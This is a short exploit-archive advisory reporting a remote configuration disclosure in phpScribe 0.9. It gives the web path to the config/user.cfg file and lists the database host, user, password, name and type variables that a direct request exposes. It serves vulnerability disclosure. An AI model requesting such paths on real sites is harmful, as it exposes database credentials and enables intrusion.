id: 4586
date: 01/01/2009
title: phpScribe 0.9 (user.cfg) Remote Config Disclosure Vulnerability
author: ahmadbady
cves: 

===============================================================
phpScribe 0.9 (user.cfg) Remote Config Disclosure Vulnerability
===============================================================


.......................................................................................................

/Remote Config File Disclosure/

script: phpscribe-0.9
   
***************************************************************************
download from:http://downloads.sourceforge.net/phpscribe/phpscribe-0.9.zip?modtime=1071100800&big_mirror=0
   
***************************************************************************
vul:

www.site.com/path/config/user.cfg
................................
$PS_USER_CFG['DATABASE_HOST']="";
$PS_USER_CFG['DATABASE_USER']="";
$PS_USER_CFG['DATABASE_PASS']="";
$PS_USER_CFG['DATABASE_BASE']="";
$PS_USER_CFG['DATABASE_TYPE']=""
...............................
-------------------------------------------------
-------------------------------------------------  
*************************************************



#  0day.today [2023-03-23]  #